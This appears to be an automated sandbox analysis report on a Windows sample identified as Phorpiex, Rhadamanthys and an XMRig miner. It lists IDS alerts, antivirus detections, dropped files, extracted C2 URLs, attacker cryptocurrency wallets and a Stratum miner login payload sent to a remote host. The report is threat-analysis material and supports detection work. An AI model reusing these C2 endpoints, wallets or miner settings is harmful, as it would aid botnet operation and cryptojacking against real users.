Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:43.307087+0100	2856563	1	A Network Trojan was detected	192.168.2.11	63463	1.1.1.1	53	UDP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:32:11.707461+0100	2854802	1	Domain Observed Used for C2 Detected	92.255.85.66	5188	192.168.2.11	49792	TCP

ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:34.169860+0100	2853272	1	A Network Trojan was detected	185.215.113.66	80	192.168.2.11	49710	TCP

ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:52.642676+0100	2853292	1	Malware Command and Control Activity Detected	192.168.2.11	49721	185.215.113.66	80	TCP

ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:31:56.247698+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49747	185.215.113.66	80	TCP
2024-12-05T17:31:59.111763+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:04.849116+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49756	185.215.113.66	80	TCP
2024-12-05T17:32:07.374436+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:12.945904+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49781	185.215.113.66	80	TCP
2024-12-05T17:32:15.415639+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:21.799108+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49800	185.215.113.66	80	TCP
2024-12-05T17:32:24.736506+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:30.926727+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49819	185.215.113.66	80	TCP
2024-12-05T17:32:33.492490+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49838	185.215.113.66	80	TCP
2024-12-05T17:32:41.753669+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:44.277680+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:47.058413+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:49.525535+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:52.001242+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49860	91.202.233.141	80	TCP
2024-12-05T17:32:56.706016+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49903	185.215.113.66	80	TCP
2024-12-05T17:33:00.283137+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49912	185.215.113.66	80	TCP
2024-12-05T17:33:04.389434+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49922	185.215.113.66	80	TCP
2024-12-05T17:33:08.017766+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49933	185.215.113.66	80	TCP
2024-12-05T17:33:11.536043+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49941	185.215.113.66	80	TCP
2024-12-05T17:33:16.187905+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49953	91.202.233.141	80	TCP
2024-12-05T17:33:19.696726+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49963	91.202.233.141	80	TCP
2024-12-05T17:33:23.261472+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49971	91.202.233.141	80	TCP
2024-12-05T17:33:26.948685+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49981	91.202.233.141	80	TCP
2024-12-05T17:33:30.498877+0100	2848295	1	A Network Trojan was detected	192.168.2.11	49991	91.202.233.141	80	TCP
2024-12-05T17:33:35.287748+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50003	185.215.113.66	80	TCP
2024-12-05T17:33:38.893392+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50010	185.215.113.66	80	TCP
2024-12-05T17:33:42.671566+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50020	185.215.113.66	80	TCP
2024-12-05T17:33:46.277185+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50028	185.215.113.66	80	TCP
2024-12-05T17:33:49.902410+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50031	185.215.113.66	80	TCP
2024-12-05T17:33:54.656231+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50033	91.202.233.141	80	TCP
2024-12-05T17:33:58.212808+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50035	91.202.233.141	80	TCP
2024-12-05T17:34:01.914153+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50036	91.202.233.141	80	TCP
2024-12-05T17:34:05.860091+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50038	91.202.233.141	80	TCP
2024-12-05T17:34:10.077835+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50041	91.202.233.141	80	TCP
2024-12-05T17:34:15.521961+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50043	185.215.113.66	80	TCP
2024-12-05T17:34:19.357396+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50045	185.215.113.66	80	TCP
2024-12-05T17:34:23.229363+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50046	185.215.113.66	80	TCP
2024-12-05T17:34:27.083721+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50048	185.215.113.66	80	TCP
2024-12-05T17:34:30.871341+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50050	185.215.113.66	80	TCP
2024-12-05T17:34:36.240351+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50052	91.202.233.141	80	TCP
2024-12-05T17:34:40.418042+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50054	91.202.233.141	80	TCP
2024-12-05T17:34:44.421681+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50055	91.202.233.141	80	TCP
2024-12-05T17:34:48.157586+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50057	91.202.233.141	80	TCP
2024-12-05T17:34:52.510546+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50059	91.202.233.141	80	TCP
2024-12-05T17:34:58.674738+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50061	185.215.113.66	80	TCP
2024-12-05T17:35:02.360041+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50063	185.215.113.66	80	TCP
2024-12-05T17:35:06.198040+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50064	185.215.113.66	80	TCP
2024-12-05T17:35:09.837541+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50066	185.215.113.66	80	TCP
2024-12-05T17:35:13.491459+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50068	185.215.113.66	80	TCP
2024-12-05T17:35:18.167455+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50070	91.202.233.141	80	TCP
2024-12-05T17:35:21.797150+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50071	91.202.233.141	80	TCP
2024-12-05T17:35:25.411308+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50073	91.202.233.141	80	TCP
2024-12-05T17:35:29.061048+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50075	91.202.233.141	80	TCP
2024-12-05T17:35:32.740048+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50077	91.202.233.141	80	TCP
2024-12-05T17:35:37.820344+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50078	185.215.113.66	80	TCP
2024-12-05T17:35:41.796669+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50080	185.215.113.66	80	TCP
2024-12-05T17:35:45.373070+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50082	185.215.113.66	80	TCP
2024-12-05T17:35:48.870959+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50084	185.215.113.66	80	TCP
2024-12-05T17:35:52.381305+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50085	185.215.113.66	80	TCP
2024-12-05T17:35:56.905546+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50087	91.202.233.141	80	TCP
2024-12-05T17:36:00.434999+0100	2848295	1	A Network Trojan was detected	192.168.2.11	50089	91.202.233.141	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: f5TWdT5EAc.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1329646
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1351777
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Avira: detection malicious, Label: HEUR/AGEN.1351777
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Avira: detection malicious, Label: WORM/Phorpiex.olrti
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 9.2.2779421088.exe.f40000.0.unpack	Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f"}
Source: 5.0.sysnldcvmr.exe.400000.0.unpack	Malware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	ReversingLabs: Detection: 70%
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\sysnldcvmr.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: f5TWdT5EAc.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: f5TWdT5EAc.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	4_2_0040BE80
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	5_2_0040BE80
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	7_2_0040BE80

Phishing

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3945886291.000001A567EC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.11:50039 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Source: f5TWdT5EAc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\34D7.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source:	Binary string: wkernel32.pdb source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	4_2_004066B0
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00406570
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_004066B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 5_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406570
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	7_2_004066B0
Source: C:\Windows\sysnldcvmr.exe	Code function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406570
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F71B09 FindFirstFileExW,	9_2_00F71B09
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Code function: 13_2_001D1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,	13_2_001D1A20

Source: C:\Windows\System32\fontdrvhost.exe

Code function: 4x nop then dec esp

12_2_00000270F6670511

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.11:63463 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 95.81.102.72:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 92.38.19.10:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49756 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.11:49710
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49747 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.187.91.108:40500
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.66:5188 -> 192.168.2.11:49792
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49781 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 45.150.24.42:40500
Source: Network traffic	Suricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.11:49721 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 109.74.69.43:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49800 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49819 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.133.136.145:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.176.72.136:40500
